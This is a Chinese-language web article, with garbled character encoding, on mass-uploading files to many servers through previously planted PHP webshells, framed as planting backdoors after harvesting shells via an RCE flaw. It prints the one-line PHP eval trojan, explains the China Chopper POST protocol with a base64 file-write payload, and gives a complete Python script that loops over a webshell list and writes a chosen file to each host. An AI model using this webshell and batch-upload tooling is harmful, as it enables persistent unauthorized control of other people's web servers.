PHP實(shí)現(xiàn)批量上傳單個(gè)文件
很多時(shí)候當(dāng)我們通過某個(gè)通用型RCE漏洞批量抓取了很多的webshell后,可能想要批量傳個(gè)后門以備后用。這時(shí),我們不禁會(huì)面臨一個(gè)問題,使用菜刀一個(gè)個(gè)上傳顯得太慢,那么如何快速的實(shí)現(xiàn)文件的批量上傳呢?本文給大家介紹基于php如何實(shí)現(xiàn)這類需求。
0×01 原理分析
首先,我們必須了解菜刀是如何通過一句話木馬來實(shí)現(xiàn)web服務(wù)器的文件管理的。
下面是最常見的php一句話木馬:
<?php eval($_POST[1]); ?>
當(dāng)我們將一句話木馬上傳到web服務(wù)器上后,我們就可以直接在菜刀中輸入上面的密碼(如上例中的1)連接到服務(wù)器上來管理文件。
那么,此處的菜刀如何通過簡(jiǎn)單的一句話就可以實(shí)現(xiàn)對(duì)服務(wù)器的管理和控制呢?通過分析菜刀的原理,我們不難發(fā)現(xiàn)菜刀是利用了eval這個(gè)函數(shù)來執(zhí)行通過POST方法傳過來的命令語句。
因此,如果我們想通過菜刀一句話木馬來實(shí)現(xiàn)文件上傳的話,只需要向遠(yuǎn)程服務(wù)里上包含一句話的url發(fā)送一個(gè)帶文件寫入命令的POST請(qǐng)求即可,比如:
POST:
1=@eval($_POST[z0]);&z0=echo $_SERVER['DOCUMENT_ROOT'];
上面代碼包含2個(gè)部分:
1. 一句話的密碼
2. 發(fā)送給服務(wù)器端的php執(zhí)行代碼
既然知道原理了,我們只需要發(fā)送如下的POST請(qǐng)求即可完成利用一句話上傳文件的功能:
POST:
仔細(xì)分析一下這段POST數(shù)據(jù)包含以下幾個(gè)部分:
1. 首先是php一句話的密碼1
2. 通過eval方法來執(zhí)行base64解碼后的z0,解碼整理后顯示如下:
@ini_set("display_errors","0"); @set_time_limit(0); @set_magic_quotes_runtime(0); echo("->|");; $f=base64_decode($_POST["z1"]); $c=base64_decode($_POST["z2"]); $c=str_replace("\r","",$c); $c=str_replace("\n","",$c); $buf=""; for($i=0;$i<strlen($c);$i+=1) $buf.=substr($c,$i,1); echo(@fwrite(fopen($f,"w"),$buf)); echo("|<-"); die();
3. 在z0中繼續(xù)調(diào)用base64解碼后的z1和z2,解碼后如下:
z1=/var/www/root/1.txt z2=hello world!
至此,我們可以很清楚的發(fā)現(xiàn)上面的POST請(qǐng)求的作用實(shí)際上是將一個(gè)寫有hello world!的名為1.txt的文件上傳至服務(wù)器上/var/www/root/路徑下。
0×02 代碼實(shí)現(xiàn)
基于上面的原理分析,我們可以利用下面的代碼基于php一句話來實(shí)現(xiàn)文件批量上傳:
#!/usr/bin/python #coding=utf-8 import urllib import urllib2 import sys import base64 import re def post(url, data): req = urllib2.Request(url) data = urllib.urlencode(data) opener = urllib2.build_opener(urllib2.HTTPCookieProcessor()) response = opener.open(req, data) return response.read() def get_shell_path(posturl,passwd): shell_path = "" try: data = {} data[passwd] = '@eval(base64_decode($_POST[z0]));' data['z0']='ZWNobyAkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ107' shell_path = post(posturl, data).strip() except Exception: pass return shell_path def main(): print '\n+++++++++Batch Uploading Local File (Only for PHP webshell)++++++++++\n' shellfile = sys.argv[1] # 存放webshell路徑和密碼的文件 localfile = sys.argv[2] # 本地待上傳的文件名 shell_file = open(shellfile,'rb') local_content = str(open(localfile,'rb').read()) for eachline in shell_file: posturl = eachline.split(',')[0].strip() passwd = eachline.split(',')[1].strip() try: reg = ".*/([^/]*\.php?)" match_shell_name = re.search(reg,eachline) if match_shell_name: shell_name=match_shell_name.group(1) shell_path = get_shell_path(posturl,passwd).strip() target_path = shell_path.split(shell_name)[0]+localfile target_path_base64 = base64.b64encode(target_path) target_file_url = eachline.split(shell_name)[0]+localfile data = {} data[passwd] = '@eval(base64_decode($_POST[z0]));' data['z0']='QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzsKJGY9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoxIl0pOwokYz1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejIiXSk7CiRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOwokYz1zdHJfcmVwbGFjZSgiXG4iLCIiLCRjKTsKJGJ1Zj0iIjsKZm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MSkKICAgICRidWYuPXN1YnN0cigkYywkaSwxKTsKZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1ZikpOwplY2hvKCJ8PC0iKTsKZGllKCk7' data['z1']=target_path_base64 data['z2']=base64.b64encode(local_content) response = post(posturl, data) if response: print '[+] '+target_file_url+', upload succeed!' else: print '[-] '+target_file_url+', upload failed!' else: print '[-] '+posturl+', unsupported webshell!' except Exception,e: print '[-] '+posturl+', connection failed!' shell_file.close() if __name__ == '__main__': main()
webshell.txt的格式: [一句話webshell文件路徑],[webshell連接密碼]如下:
http://www.example1.com/1.php, 1
http://www.example2.com/1.php, 1
http://www.example3.com/1.php, 1
保存上面腳本為batch_upload_file.py,執(zhí)行命令python batch_upload_file.py webshell.txt 1.txt,效果顯示如下:
以上內(nèi)容給大家介紹了PHP實(shí)現(xiàn)批量上傳單個(gè)文件的相關(guān)知識(shí),希望大家喜歡。
相關(guān)文章
PHP實(shí)現(xiàn)長文章分頁實(shí)例代碼(附源碼)
當(dāng)文章內(nèi)容比較長,為了更好的滿足用戶體驗(yàn)度,我們將文章內(nèi)容分頁顯示處理,而一般分頁處理是在后臺(tái)發(fā)布文章的時(shí)候就將提交的內(nèi)容生成多個(gè)分頁后的靜態(tài)文件。通過本文結(jié)合實(shí)例采用php動(dòng)態(tài)將長文章內(nèi)容進(jìn)行分頁處理2016-02-02yii實(shí)現(xiàn)創(chuàng)建驗(yàn)證碼實(shí)例解析
這篇文章主要介紹了yii實(shí)現(xiàn)創(chuàng)建驗(yàn)證碼的方法,很常見的一類功能,需要的朋友可以參考下2014-07-07PHP實(shí)現(xiàn)四種基礎(chǔ)排序算法的運(yùn)行時(shí)間比較(推薦)
本文給大家介紹PHP實(shí)現(xiàn)四種基礎(chǔ)排序算法的運(yùn)行時(shí)間比較,非常不錯(cuò),具有參考借鑒價(jià)值,感興趣的朋友一起看下吧2016-08-08php 流程控制switch的簡(jiǎn)單實(shí)例
下面小編就為大家?guī)硪黄猵hp 流程控制switch的簡(jiǎn)單實(shí)例。小編覺得挺不錯(cuò)的,現(xiàn)在就分享給大家,也給大家做個(gè)參考。一起跟隨小編過來看看吧2016-06-06php 微信公眾平臺(tái)開發(fā)模式實(shí)現(xiàn)多客服的實(shí)例代碼
這篇文章主要介紹了php 微信公眾平臺(tái)開發(fā)模式實(shí)現(xiàn)多客服的實(shí)例代碼的相關(guān)資料,需要的朋友可以參考下2016-11-11iOS+PHP注冊(cè)登錄系統(tǒng) PHP部分(上)
這篇文章主要介紹了iOS+PHP注冊(cè)登錄系統(tǒng)的PHP部分,具有一定的參考價(jià)值,感興趣的小伙伴們可以參考一下2016-12-12